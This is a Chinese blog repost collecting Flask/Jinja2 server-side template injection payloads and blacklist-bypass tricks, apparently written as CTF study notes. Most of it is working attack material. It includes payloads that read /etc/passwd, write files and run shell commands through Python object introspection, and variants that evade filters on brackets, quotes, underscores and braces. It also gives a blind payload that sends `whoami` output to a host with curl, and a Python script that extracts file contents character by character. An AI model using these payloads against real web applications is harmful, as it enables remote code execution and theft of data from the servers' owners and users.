flask ssti 的一些黑名单绕过姿势

最新推荐文章于 2024-05-09 19:24:51 发布
最新推荐文章于 2024-05-09 19:24:51 发布
阅读量2.8k 收藏 14
点赞数 3
文章标签: python 信息安全
原文链接:https://p0sec.net/index.php/archives/120/
版权

转自 https://p0sec.net/index.php/archives/120/

最近学flask的ssti,看到一些比较好的文章,分享并记录学习一下

0x00 获取基本类

首先通过str、dict、tuple或list获取python的基本类(当然也可以利用一些其他在jinja2中存在的对象,比如request):

  • ''.__class__.__mro__[2]
  • {}.__class__.__bases__[0]
  • ().__class__.__bases__[0]
  • [].__class__.__bases__[0]
  • request.__class__.__mro__[8]

可以借助__getitem__绕过中括号限制:

  • ''.__class__.__mro__.__getitem__(2)
  • {}.__class__.__bases__.__getitem__(0)
  • ().__class__.__bases__.__getitem__(0)
  • request.__class__.__mro__.__getitem__(8)

下面基本类就用object代替,测试时将object换成上面任意一个

0x01 文件操作

object.__subclasses__()[40]为file类,所以可以对文件进行操作

读文件:

  • object.__subclasses__()[40]('/etc/passwd').read()

写文件:

  • object.__subclasses__()[40]('/tmp').write('test')

0x02 执行命令

object.__subclasses__()[59].__init__.func_globals.linecache下直接有os类,可以直接执行命令:

  • object.__subclasses__()[59].__init__.func_globals.linecache.os.popen('id').read()

object.__subclasses__()[59].__init__.__globals__.__builtins__下有eval__import__等的全局函数,可以利用此来执行命令:

  • object.__subclasses__()[59].__init__.__globals__['__builtins__']['eval']("__import__('os').popen('id').read()")
  • object.__subclasses__()[59].__init__.__globals__.__builtins__.eval("__import__('os').popen('id').read()")
  • object.__subclasses__()[59].__init__.__globals__.__builtins__.__import__('os').popen('id').read()
  • object.__subclasses__()[59].__init__.__globals__['__builtins__']['__import__']('os').popen('id').read()

0x03 ByPass

分享一些payload

{{ session['__cla'+'ss__'].__bases__[0].__bases__[0].__bases__[0].__bases__[0]['__subcla'+'sses__']()[312].__init__.__globals__['po'+'pen']('cat /Th1s__is_S3cret').read() }}

{{ session['__cla'+'ss__'].__bases__[0].__bases__[0].__bases__[0].__bases__[0]['__subcla'+'sses__']()[256].__enter__.__globals__['po'+'pen']('cat /Th1s_is__F1114g').read() }}

1. 过滤[

读文件:

  • ''.__class__.__mro__.__getitem__(2).__subclasses__().pop(40)('/etc/passwd').read()

执行命令:

  • ''.__class__.__mro__.__getitem__(2).__subclasses__().pop(59).__init__.func_globals.linecache.os.popen('ls').read()

2. 过滤引号

先获取chr函数,赋值给chr,后面拼接字符串就好了:

  • {% set chr=().__class__.__bases__.__getitem__(0).__subclasses__()[59].__init__.__globals__.__builtins__.chr %}{{ ().__class__.__bases__.__getitem__(0).__subclasses__().pop(40)(chr(47)%2bchr(101)%2bchr(116)%2bchr(99)%2bchr(47)%2bchr(112)%2bchr(97)%2bchr(115)%2bchr(115)%2bchr(119)%2bchr(100)).read() }}

借助request对象(推荐):

  • {{ ().__class__.__bases__.__getitem__(0).__subclasses__().pop(40)(request.args.path).read() }}&path=/etc/passwd

执行命令:

  • {% set chr=().__class__.__bases__.__getitem__(0).__subclasses__()[59].__init__.__globals__.__builtins__.chr %}{{ ().__class__.__bases__.__getitem__(0).__subclasses__().pop(59).__init__.func_globals.linecache.os.popen(chr(105)%2bchr(100)).read() }}
  • {{ ().__class__.__bases__.__getitem__(0).__subclasses__().pop(59).__init__.func_globals.linecache.os.popen(request.args.cmd).read() }}&cmd=id

3. 过滤双下划线__

{{ ''[request.args.class][request.args.mro][2][request.args.subclasses]()[40]('/etc/passwd').read() }}&class=__class__&mro=__mro__&subclasses=__subclasses__

4. 过滤{{

可以利用{%%}标记

  • {% if ''.__class__.__mro__[2].__subclasses__()[59].__init__.func_globals.linecache.os.popen('curl http://127.0.0.1:7999/?i=`whoami`').read()=='p' %}1{% endif %}

相当于盲命令执行,利用curl将执行结果带出来

如果不能执行命令,读取文件可以利用盲注的方法逐位将内容爆出来

  • {% if ''.__class__.__mro__[2].__subclasses__()[40]('/tmp/test').read()[0:1]=='p' %}~p0~{% endif %}

平时的SQL注入盲注脚本改一下就ok

# -*- coding: utf-8 -*-
import requests


url = 'http://127.0.0.1:8080/'

def check(payload):
    postdata = {
        'exploit':payload
        }
    r = requests.post(url, data=postdata).content
    return '~p0~' in r

password  = ''
s = r'0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!"$\'()*+,-./:;<=>?@[\\]^`{|}~\'"_%'

for i in xrange(0,100):
    for c in s:
        payload = '{% if "".__class__.__mro__[2].__subclasses__()[40]("/tmp/test").read()['+str(i)+':'+str(i+1)+'] == "'+c+'" %}~p0~{% endif %}'
        if check(payload):
            password += c
            break
    print password

参考:

qq_40800734
关注
  • 3
    点赞
  • 14
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ssti-payload:SSTI有效载荷生成器
02-06
SSTI有效载荷发生器 该生成器是针对特定类型的Java SSTI的,其受以下启发: ${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99)....
SSTI模块注入】SSTI+Flask+Python(下):绕过过滤
07-25 2476
SSTI绕过过滤
Python爬虫批量访问突破访问限制封禁的方法
LuckyDucky的博客
02-26 7523
坑述 数据采集常用的方法是写一个爬虫程序向网络服务器请求数据(通常是用HTML表单或其他网页文件),然后对数据进行解析,提取需要的信息。 然而 批量访问时会有访问限制 更会认为频繁访问是恶意攻击,对ip进行封禁 导致我们的爬虫程序被终止,timeout httperror等 爬虫被封禁常见原因列表 首先,检查JavaScript。如果你从网络服务器收到的页面是空白的,缺少信息,或其遇到他不符合你...
网络安全笔记--文件上传1(文件上传基础、常见后端验证、黑名单、白名单、后端绕过方式)
swy66的博客
08-17 3392
文件上传相关知识基础,白名单绕过黑名单绕过
[CTF的PASSBY]浅谈FLASK-jinja2 SSTI绕过
qq_64201116的博客
07-04 2109
我目前了解的后端的三大语言,基于php,基于java,基于python,这篇文章就来浅浅谈谈关于python构造的flask过滤SSTI不严谨导致的SSTI注入
SSTI 绕过方法总结
ZQING
09-06 482
学习绕过的重点是掌握一个技术的使用方法。
Python Flask SSTI 之 长度限制绕过
weixin_43995419的博客
09-12 905
Python flask SSTI 之 长度限制绕过
SSTI注入——python中的ssti
wwwwyyyrre的博客
06-05 794
python里的运用最多的应该就是flask模板注入 也可以直接用tplmap自动化注入来找到ssti的注入点python21.2.3.4.5.6.python31.2.
python 黑名单过滤
Hani的 编程生活
07-24 2464
需要过滤一些词语 写了下面这个函数,在blacklist 文件中添加需要过滤的词语 #过滤黑名单列表中出现的 def in_lists(str):     str_lists=[]     fd = open('./filter/blacklist')     for line in fd.readlines():         str_lists.append(line.st
Flask SSTI/沙箱逃逸的一些总结
01-20
0x00 SSTI原理 ​ 模板注入,与SQL注入、命令注入等原理相似,都是用户的输入数据没有被合理的处理控制时,就有可能数据插入了程序段中成为程序的一部分,从而改变了程序的执行逻辑。 0x01 沙箱逃逸原理 沙盒/沙箱 ...
SSTI漏洞学习(下)——Flask_Jinja模板引擎的相关绕过 .pdf
09-05
SSTI漏洞学习(下)——Flask_Jinja模板引擎的相关绕过 安全人才 威胁情报 安全建设 安全开发 解决方案
SSTI
03-09
SSTI
fenjing工具,ssti
12-17
fenjing一把梭哈ssti,简单绕过waf
终于,Flask 迎来了真正的对手!
cainiao_python的博客
09-21 672
点击上方“菜鸟学Python”,选择“星标”公众号超级无敌干货第一时间推给你!!!Flask 是一个轻量级的可定制框架,使用 Python 语言编写,框架特点主要包括灵活、轻便、安全且容...
pythonflask框架详解
热门推荐
专注自动化、性能测试、测试架构学习交流
06-11 3万+
Flask 本身相当于一个内核,其他几乎所有的功能都要用到扩展,都需要用第三方的扩展来实现,比如可以用 Flask 扩展加入ORM、窗体验证工具,文件上传、身份验证等。Flask 没有默认使用的数据库,你可以选择 MySQL,也可以用 NoSQL。 其 WSGI 工具箱采用 Werkzeug(路由模块),模板引擎则使用 Jinja2。这两个也是 Flask 框架的核心。 Flask常用扩展包: Flask-SQLalchemy:操作数据库; Flask-script:插入脚本; Flask-mig
Python爬虫实战,拉黑 QQ 空间屏蔽我的“大人物“
Python_sn的博客
10-26 895
前景提要 最近发现有人QQ空间对我展开了屏蔽,咱们也不知道怎么惹到人家了,一气之下写了一个小爬虫看看到底谁把我屏蔽了。写小本本记下来!!! 代码在最尾部,需要请自取。 很多人学习python,不知道从何学起。 很多人学习python,掌握了基本语法过后,不知道在哪里寻找案例上手。 很多已经做案例的人,却不知道如何去学习更加高深的知识。 那么针对这三类人,我给大家提供一个好的学习平台,免费领取视频教程,电子书籍,以及课程的源代码!??¤QQ群:623406465 准备工作 python环境: pyt
flask中的请求钩子
longting_的博客
06-10 2018
1.before_first_request:在第一次请求之前运行,只需执行一次,如链接数据库2.before_request:在每一次请求都会执行,可以在这里做权限校验操作,比如说某用户是黑名单用户,黑名单用户登录系统将遭到拒绝访问,可以使用before_request进行权限校验。3.after_request:在请求之后运行,会接收一个参数,这个参数就是前面的请求处理完毕之后, 返回的响应数...
ssti详解与例题以及绕过payload大全
HoAd'blog
02-10 8773
ssti详解与例题以及绕过payload大全 [BJDCTF2020]Cookie is so stable user=1231{{2*4}} 判断是不是ssti user={{system('ls')}} 执行命令,但不能成功,,好像是空格不可以 {{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}} 这是最后的payload https://0day.work/jinja2
Python中使用tkinter模块和类结构的结合使用举例——编写制作一个简单的加数GUI界面
最新发布
qq_18937049的博客
05-09 1490
编写程序实现GUI界面是一种重要的编程技能,Python 作为一种面向对象的程序编程语言,也提供了GUI设计的库。本文以tkinter库为基础进行GUI的简单设计举例,并在编写过程中说明类结构的定义方法。
ctfshow ssti
07-27
攻击者可以通过构造特定的输入来绕过应用程序的过滤机制,成功注入恶意代码,从而导致服务器端执行该代码。 为了防止SSTI漏洞,开发人员应该谨慎处理用户输入,并在解析模板时使用安全的方法,如使用模板引擎提供的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值